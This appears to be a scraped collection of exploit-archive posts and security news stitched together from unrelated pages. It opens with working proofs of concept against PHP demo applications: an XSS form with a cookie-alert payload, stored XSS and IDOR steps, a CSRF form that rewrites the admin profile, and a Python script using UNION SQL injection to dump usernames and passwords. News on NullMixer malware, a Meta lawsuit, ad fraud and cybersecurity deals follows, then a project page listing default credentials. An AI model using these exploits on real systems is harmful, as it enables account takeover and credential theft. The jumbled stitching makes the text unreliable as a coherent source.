Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> search recoder </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/search.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="searchdata" value="<script>alert(document.cookie);</script>">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="search">search</button>        </form>    </body></html></html>

Online Birth Certificate Management System 1.0 Cross Site Scripting

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

Posted Sep 27, 2022

Authored by Yousef Alraddadi

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86

Download | Favorite | View

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

    # Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Add Details.3) add full name payload => <script>alert(document.cookie);</script>4) and all field enter payload only Contact Number enter number

**File Tags**

*   ActiveX (932)
*   Advisory (78,276)
*   Arbitrary (15,276)
*   BBS (2,859)
*   Bypass (1,598)
*   CGI (1,013)
*   Code Execution (6,771)
*   Conference (671)
*   Cracker (799)
*   CSRF (3,277)
*   DoS (22,065)
*   Encryption (2,340)
*   Exploit (50,129)
*   File Inclusion (4,160)
*   File Upload (945)
*   Firewall (821)
*   Info Disclosure (2,565)
*   Intrusion Detection (861)
*   Java (2,823)
*   JavaScript (808)
*   Kernel (6,156)
*   Local (14,093)
*   Magazine (586)
*   Overflow (12,252)
*   Perl (1,413)
*   PHP (5,057)
*   Proof of Concept (2,284)
*   Protocol (3,350)
*   Python (1,406)
*   Remote (29,862)
*   Root (3,466)
*   Ruby (581)
*   Scanner (1,630)
*   Security Tool (7,737)
*   Shell (3,077)
*   Shellcode (1,203)
*   Sniffer (883)
*   Spoof (2,123)
*   SQL Injection (16,057)
*   TCP (2,369)
*   Trojan (682)
*   UDP (872)
*   Virus (660)
*   Vulnerability (30,657)
*   Web (9,114)
*   Whitepaper (3,723)
*   x86 (943)
*   XSS (17,396)
*   Other

**File Archives**

*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   Older

**Systems**

*   AIX (426)
*   Apple (1,899)
*   BSD (369)
*   CentOS (55)
*   Cisco (1,915)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,207)
*   HPUX (878)
*   iOS (323)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (42,923)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (12,009)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,027)
*   UNIX (9,115)
*   UnixWare (185)
*   Windows (6,473)
*   Other

Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,First Name, Phone number, and other data

Online Birth Certificate Management System 1.0 Insecure Direct Object Reference

Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> CSRF update Profile </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="adminname" value="csrf111">            <input type="hidden" name="username" value="csrf">            <input type="hidden" name="email" value="csrf">            <input type="hidden" name="mobilenumber" value="0">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>        </form>    </body></html>

Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Food Ordering Management System - SQL Injection# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0#/usr/bin/python3 import requests import osimport sysimport timeimport randomfrom bs4 import BeautifulSoup# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #           SQL injection (Food Ordering Management System)      ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url =>  "))username = str(input("Enter Username => : "))name = ("test123456")password = ("test123456")phone = ("4511233199")number = ("1234567891000000")cvv = ("444")req = requests.Session()regsiter_page = (url+"/foms/routers/register-router.php")regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}req_regsiter = req.post(regsiter_page,data=regsiter)print("[+] Regsiter Successfully")login = {'username':username,'password':password}login_page = (url+"/foms/routers/router.php")req_login = req.post(login_page,data=login)print("[+] Login Successfully")sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")text = sql.textsoup = BeautifulSoup(text,"html.parser")print("[+] SQL Injction Get Users and Password from table Users")for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):    time.sleep(0.2)    print(link.get)

Food Ordering Management System 1.0 SQL Injection

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems.
"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called **NullMixer** on compromised systems.

"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware, and many others."

Besides siphoning users' credentials, address, credit card data, cryptocurrencies, and even Facebook and Amazon account session cookies, what makes NullMixer insidious is its ability to download dozens of trojans at once, significantly widening the scale of the infections.

Attack chains typically start when a user attempts to download cracked software from one of the sites, which leads to a password-protected archive that contains an executable file that, for its part, drops and launches a second setup binary designed to deliver an array of malicious files.

These malicious websites leverage search engine optimization (SEO) poisoning techniques such as keyword stuffing to feature them highly in search engine results. Similar tactics have been adopted by actors behind GootLoader and SolarMarker campaigns.

NullMixer, last month, was linked to the distribution of a rogue Google Chrome extension called FB Stealer, which is capable of Facebook credential theft and search engine substitution.

Some of the other prominent malware families distributed by the dropper include DanaBot and a raft of information-stealing malware such as ColdStealer, PseudoManuscrypt, Raccoon Stealer, Redline Stealer, and Vidar.

Also deployed using NullMixer are trojan downloaders like FormatLoader, GCleaner, LegionLoader (aka Satacom), LgoogLoader, PrivateLoader, SgnitLoader, ShortLoader, and SmokeLoader, as well as the C-Joker cryptocurrency wallet stealer.

Kaspersky said it blocked attempts to infect more than 47,778 victims worldwide, with a majority of the users located in Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey, and the U.S. The threat actor operating NullMixer has not been attributed to a known group.

The latest findings are yet another indication that malware and unwanted applications are being increasingly propagated via pirated software. It's also recommended to check online accounts regularly for unknown transactions.

"Any download of files from untrustworthy resources is a real game of roulette: you never know when it will fire, and which threat you will get this time," Kaspersky researcher Haim Zigel said. "Receiving NullMixer, users get several threats at once."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New NullMixer Malware Campaign Stealing Users' Payment Data and Credentials

Categories: News
Categories: Privacy
Meta is being sued by a couple of its users for allegedly deliberately circumventing Apple's privacy features on the iPhone.



(Read more...)




The post Facebook users sue Meta for allegedly building "secret workaround" to Apple privacy safeguards appeared first on Malwarebytes Labs.

Posted: September 27, 2022 by

Last week, two Facebook users filed a class-action complaint against Meta in San Francisco's federal court, alleging the company built a "secret workaround" to Apple's safeguards that protect iPhone users from tracking. Facebook circumvents Apple's privacy rules by opening in-app browsers within its apps instead of the iPhone's default browser. By doing this, the users further allege Meta violated state and federal laws regarding the unauthorized collection of personal data.

The suit came after Felix Krause (@KrauseFx), a data privacy researcher and former Google engineer, released a report in August 2022 about iOS privacy, featuring a tool he created himself called the InAppBrowser. It can check if an in-app browser injects JavaScript (JS) code, which could be problematic for iOS and Android users as this causes potential security and privacy risks to users.

In the case of Meta, this JS code is Meta Pixel.

"The iOS Instagram and Facebook app render all third party links and ads within their app using a custom in-app browser," said Krause in his blog. "This causes various risks for the user, with the host app being able to track every single interaction with external websites, from all form inputs like passwords and addresses, to every single tap."

Krause also included the following caveat: "**Important**: Just because an app injects JavaScript into external websites, doesn’t mean the app is doing anything malicious. There is no way for us to know the full details on what kind of data each in-app browser collects, or how or if the data is being transferred or used."

In an email interview with Bloomberg, a spokesperson from Meta said that Krause's allegations are "without merit" and it will defend itself.

"We have designed our in-app browser to respect users' privacy choices, including how data may be used for ads," the email statement said.

In February, Meta admitted that Apple's App Tracking Transparency (ATT) feature would decrease its ad revenue by $10B. This admission, according to CNBC, is "the most concrete data point so far on the impact to the advertising industry" in terms of Apple's privacy feature, which limits companies from accessing the data of iPhone users.

"This allows Meta to intercept, monitor, and record its users' interactions and communications with third parties, providing data to Meta that it aggregates, analyzes, and uses to boost its advertising revenue," the suit reads.

Facebook and Instagram weren't the only apps mentioned in Krause's report. TikTok, Snapchat, and Amazon were also mentioned.

**RELATED ARTICLES**

Facebook users sue Meta for allegedly building "secret workaround" to Apple privacy safeguards

As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019.
The latest iteration, dubbed Scylla by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codename Poseidon and Charybdis, respectively.
Prior to their removal from the app

As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019.

The latest iteration, dubbed **Scylla** by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codename Poseidon and Charybdis, respectively.

Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times.

The original Poseidon operation comprised over 40 Android apps that were designed to display ads out of context or hidden from the view of the device user.

Charybdis, on the other hand, was an improvement over the former by making use of code obfuscation tactics to target advertising platforms.

Scylla presents the latest adaption of the scheme in that it expands beyond Android to make a foray into the iOS ecosystem for the first time, alongside relying on additional layers of code roundabout using the Allatori tool.

These apps, once installed, are engineered to commit different kinds of ad fraud, marking a significant step up in sophistication from previous variants.

These include spoofing popular apps such as streaming services to trick advertising SDKs into placing ads, serving out-of-context and "hidden" ads via off-screen WebViews, and generating fraudulent ad clicks to profit off ads.

"In layman's terms, the threat actors code their apps to pretend to be other apps for advertising purposes, often because the app they're pretending to be is worth more to an advertiser than the app would be by itself," the company said.

As always, users are advised to scrutinize apps prior to downloading them, and avoid third-party app stores on the web that could harbor malicious applications.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme

Funding has been somewhat lower than last year, but investment remains healthy, analysts say, amid thirst for cloud security in particular.

The cybersecurity industry continues to remain largely unaffected by the uncertainty surrounding the rest of the economy.

Though funding activity this year is somewhat slower than in 2021 and market valuations of cybersecurity firms have taken a hit, mergers and acquisitions activity has remained strong through the year, as has investor interest in the sector.

So far in the third quarter, there have been multiple major transactions that, according to analysts, highlight the overall robustness of the sector amid broadening concerns of a recession.

**Robust M&A Activity**

Two of the biggest involved previously announced deals: In September, Google completed its planned acquisition of incident response firm Mandiant for $5.4 billion, and in August, private equity firm Thoma Bravo closed it $6.9 billion purchase of identity management vendor SailPoint.

That same month, Thoma Bravo announced plans to acquire Ping Identity for $2.8 billion in cash. The $28.50 per share that the private equity firm offered for Ping represented a 63% premium over the identity management vendor's closing share price on Aug. 2. Thoma Bravo will take Ping private once the deal is completed in the fourth quarter. 

Other examples of M&A activity in the third quarter include Devo's purchase of SOAR vendor LogicHub for an undisclosed amount, Volaris Group's acquisition of Hitachi ID Systems in September, Cerberus Sentinel's purchase of application security vendor CyberViking, and CrowdStrike's acquisition of Reposify last week.

M&A activity in the third quarter is consistent with activity in the previous two quarters. Data from Momentum Cyber shows there were a total of 148 cybersecurity M&A deals during the first half of 2022. Total M&A volume over the period was nearly $103 billion. Momentum Cyber identified eight M&A transactions during the first half of 2022 that topped $1 billion, including the SailPoint and Mandiant deals, and private equity firm KKR's $4 billion acquisition of Barracuda.

The most obvious trend of late has been the move by larger vendors to buy into the attack surface management (ASM) space, and more specifically external attack surface management (EASM), says Rik Turner, an analyst with Omdia.

"This has, of course, been underway for a while," he says, pointing to Palo Alto's purchase of Expanse in November 2020 and Microsoft picking up RiskIQ in July 2021. "But there has been something of an intensification of this tendency of late, with Tenable acquiring Bit Discovery in April, IBM buying Randori in June, and CrowdStrike picking up Reposify last week," Turner says.

There are numerous other EASM vendors, so there will be no shortage of acquisition targets for any other big players that want to get into this market, he says.

**Multiple Market Drivers**

Turner says one of the other trends driving the M&A activity is growing interest in proactive security technologies, as opposed to the focus on reactive detection and response of the past few years.

"The proactive wave posits not a replacement technology for the reactive ones, but rather complementary ones that seek to reduce a customer's overall attack surface before threat actors have even launched an attack," Turner says. "Unlike the extended detection and response (XDR) spectrum, proactive security doesn't have a single acronym or initialism yet that can capture the imagination of the market, though Omdia is tentatively proposing security posture management, or SPM." 

Examples of products that fall into this category include cloud-specific proactive technologies such as cloud security posture management (CSPM), SaaS security posture management (SSPM), and cloud permissions management (CPM). Breach and attack simulation technologies are other examples as are vulnerability management and patch management, Turner says.

Chris Stafford, a senior manager in West Monroe's M&A practice, sees another set of factors driving the financial activity in the cybersecurity space. According to Stafford, the big ones are accelerated cloud adoption, the shift to remote work, and the continuing talent shortage. 

 "Fundamentally, cybersecurity is a really durable sector from a growth and revenue perspective," Stafford says. "All companies across all sectors require cybersecurity tools and services. That is what is fundamentally driving growth in the industry."

**Funding & VC Interest Slow but Remain Healthy**

While M&A activity has maintained a robust pace through the year, funding activity has been somewhat lower than last year, as noted earlier. Data from analyst firm IT-Harvest shows that through Sept. 1, some 220 vendors received a total of $12.3 billion in direct funding from investors. 

"That is half of 2021's record $24 billion, but more than the previous year's $10 billion," says Richard Stiennon, chief research scientist at IT-Harvest, adding that just 33 companies received more than $100 million so far this year, compared with 69 in 2021. "I expect to see the industry finish the year at $15 billion total invested," Stiennon says.

Omdia's Turner says while venture capital funding overall appears to have dipped somewhat, there is still plenty of money available for projects that VC's find especially interesting. "I think they have gotten somewhat choosier than they were in 2021," Turner says.

IT-Harvest's analysis of funding activity so far this year showed that investors are pouring more money into the security analytics space — $2.6 billion — than any other segment. Stiennon points to the more than $500 million in total that Devo has raised so far and the massive $1-plus billion funding round that Securonix received in February as examples of investor interest in this segment.

Identity and network security were the next two most active categories, with $1.4 billion in funding in each. There is also a trend of investing in cloud analytics and general security operations center tools like XDR, and a resurgence in vulnerability management startups that are getting funding, Stiennon notes.

"In short, funding is extremely healthy. No surprise to me because venture funding is not like the stock market, where you invest on expectations of next quarter's results," he says. "Most VCs have a five-year horizon, and they can count on cybersecurity to still be a growing sector through an economic downturn."

Despite Recession Jitters, M&A Dominates a Robust Cybersecurity Market

Sourcecodester Online Market Place Site 1.0 is vulnerable to Cross Site Scripting (XSS), allowing attackers to register as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.

Submitted by oretnom23 on Tuesday, April 12, 2022 - 17:21.

****Introduction****

This simple project is an **Online Market Place Site in PHP**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project is an online platform that allows sellers to publish their selling items. This simple site was inspired by the Facebook Market Place feature where sellers can even sell used items. The application has a pleasant user interface using the **Bootstrap v5 Framework** and **Material Kit Template**. It also consists of user-friendly features and functionalities.

****About the Online Market Place Site in PHP****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **Online Market Place Site in PHP** is composed of 3 User Interfaces which are the **Admin Panel**, **Seller Panel**, and **Public Site**. The **Admin Panel** is the side of the system where the system management can manage all the project data. **Admin Users** have the privilege to access and manage all the products or items that the seller published. They can also manage the list of users where they can update and delete sellers' data. The **Seller Panel** is the side of the system where the seller can manage their published items. The seller can add images and some information about the product that they are selling such as the item's specifications. They can set the quantity or stock that they have in each item they published. On the **Public Site**, site visitors or anonymous users can search for their desired product to check if someone posted a product that they wanted. Users can list all the available products and view each item's details. The posted product details also contain or display the seller's basic information and links where the possible buyer can contact them.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Category Management**
    *   Add New Category
    *   List All Categories
    *   View Category Details
    *   Edit Category Details
    *   Delete Category Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Reset User Password
    *   Delete User Details
*   **Product Management**
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Seller-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Product Management**
    *   Add New Product
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update Account and Contact Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Available Products**
*   **View Product Details**
*   **Redirect to Seller's Website**
*   **Redirect to Seller's FB Page**
*   **Get Seller's Contact Details**
*   **Search Product**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public Site****

****Product List (Public-Side)****

****Product Details****

****Seller Registration Form****

****Seller Panel****

****Admin Panel****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/uc5o9fr9ejpeg5d/php\_omps\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****omps\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****omps\_db.sql**** located inside the **database** folder.
10.  **Browse** the **Online Market Place Site in PHP** in a **browser**. i.e. ****http://localhost/omps/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****Sample Seller Access:****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Online Market Place Site in** **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   3428 views

Tag

#google